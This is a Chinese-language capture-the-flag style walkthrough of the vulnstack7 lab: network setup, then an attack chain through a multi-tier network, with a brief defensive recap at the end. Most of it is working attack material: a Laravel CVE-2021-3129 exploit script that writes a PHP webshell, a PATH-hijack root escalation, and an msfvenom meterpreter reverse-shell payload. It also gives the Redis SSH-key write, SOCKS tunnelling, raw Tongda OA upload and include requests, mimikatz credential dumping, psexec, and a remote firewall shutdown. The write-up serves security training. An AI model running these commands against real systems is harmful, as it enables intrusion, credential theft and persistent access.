1. 靶场环境搭建与网络拓扑解析vulnstack7靶场模拟了典型企业三级网络架构包含DMZ区、内网区和核心区三个安全域。这个环境配置起来确实有点复杂我刚开始搭建时也踩了不少坑。首先需要准备VMware Workstation Pro 15版本建议分配至少16GB内存否则同时运行5台虚拟机会非常卡顿。网络配置是第一个难点需要创建三个虚拟网络VMnet0桥接模式对应DMZ区IP段为192.168.31.0/24VMnet8NAT模式第二层网络IP段为192.168.52.0/24VMnet14仅主机模式核心区网络IP段为192.168.93.0/24实际部署时发现一个关键细节Ubuntu (Web 1)需要配置双网卡第一张网卡桥接对外服务第二张连接VMnet8与内网通信。Windows 7 (PC 1)同样需要双网卡分别连接VMnet8和VMnet14。这种设计模拟了真实企业中Web服务器同时暴露在互联网和内网的特殊场景。启动所有靶机后记得检查以下服务是否正常运行# DMZ区Ubuntu sudo redis-server /etc/redis.conf /usr/sbin/nginx -c /etc/nginx/nginx.conf # 内网Ubuntu sudo docker start 8e172820ac78 # Windows 7 (PC 1) C:\MYOA\bin\AutoConfig.exe # 启动通达OA2. 外部突破从Web渗透到Docker逃逸2.1 Laravel反序列化漏洞利用使用arp-scan快速定位DMZ区靶机IP后发现192.168.31.132开放了81端口的Laravel服务。这里遇到第一个技术点——CVE-2021-3129漏洞利用。我测试了多个公开EXP最终选用改进版脚本实现RCE# 修改自zhzyker的POC import requests url http://192.168.31.132:81 payload system(echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4|base64 -d /var/www/html/shell.php); headers {Accept: application/json} data {_token: payload} response requests.post(url, headersheaders, datadata)这个漏洞利用有几个关键点需要目标服务器安装phpggc组件写入webshell时注意路径权限问题蚁剑连接后发现处于Docker容器环境2.2 容器内权限提升实战拿到www-data权限后通过查找SUID文件发现可疑的shell程序find / -perm -us -type f 2/dev/null ./shell # 执行后输出类似ps的结果这里采用环境变量劫持提权echo /bin/bash /tmp/ps chmod 777 /tmp/ps export PATH/tmp:$PATH ./shell # 触发root权限的bash提权成功后通过msfvenom生成Linux木马实现持久化msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST192.168.31.96 LPORT6667 -f elf shell.elf2.3 Docker逃逸的曲折历程第一次尝试通过挂载宿主机目录修改SSH密钥失败原因在于错误判断了网络拓扑。实际上我们入侵的是Docker容器(B1)其宿主机(B)位于内网(192.168.52.0/24)而非DMZ区的A(192.168.31.132)。最终通过Redis未授权访问成功逃逸# Kali生成密钥对 ssh-keygen -t rsa -f redis_key # 写入目标Redis (echo -e \n\n; cat redis_key.pub; echo -e \n\n) key.txt cat key.txt | redis-cli -h 192.168.31.132 -x set xxx redis-cli -h 192.168.31.132 config set dir /root/.ssh redis-cli -h 192.168.31.132 config set dbfilename authorized_keys redis-cli -h 192.168.31.132 save3. 内网横向移动技术详解3.1 多层代理网络搭建面对52段和93段的隔离网络需要建立多层代理通道# Kali监听1080端口 nohup ./ew_for_linux64 -s rcsocks -l 1080 -e 1234 # Web服务器做一级代理 nohup ./ew_for_linux64 -s rssocks -d 192.168.31.96 -e 1234 # 配置proxychains vim /etc/proxychains4.conf socks5 127.0.0.1 10803.2 通达OA漏洞利用实战通过代理扫描发现192.168.52.30运行通达OA 11.3利用文件上传文件包含漏洞组合攻击POST /ispirit/im/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary----WebKitFormBoundarypyfBh1YB4pV8McGB ------WebKitFormBoundarypyfBh1YB4pV8McGB Content-Disposition: form-data; nameATTACHMENT; filenametest.jpg Content-Type: image/jpeg ?php system($_REQUEST[cmd]);?文件包含触发RCEPOST /ispirit/interface/gateway.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded json{url:/general/../../attach/im/2104/1352016168.jpg}cmdwhoami3.3 域渗透关键技术点获取Windows 7 (PC 1)控制权后使用kiwi模块抓取凭证load kiwi kiwi_cmd privilege::debug kiwi_cmd sekurlsa::logonPasswords发现域管理员凭证后通过psexec攻击域控use exploit/windows/smb/psexec set rhosts 192.168.93.30 set SMBUser administrator set SMBPass Whoami2021 exploit遇到防火墙拦截时使用sc命令远程关闭net use \\192.168.93.30\ipc$ Whoami2021 /user:Administrator sc \\192.168.93.30 create unablefirewall binpath netsh advfirewall set allprofiles state off sc \\192.168.93.30 start unablefirewall4. 防御视角下的攻击路径分析从蓝队角度复盘整个攻击链有几个关键防御节点Web应用层防御Laravel框架应及时打补丁Redis服务应设置密码认证文件上传功能需严格校验内容网络隔离检查DMZ区服务器不应同时连接内外网重要系统应设置独立VLAN严格限制ICMP和ARP流量域安全加固启用LAPS管理本地管理员密码限制域管理员登录范围监控异常Kerberos票证请求这个靶场最值得学习的是多层网络环境下的渗透测试方法。在实际攻防演练中红队往往需要突破多个安全域而防御方则需要建立纵深防御体系。通过分析ATTCK矩阵中的Tactic和Technique可以更系统地规划攻击路径和防御策略。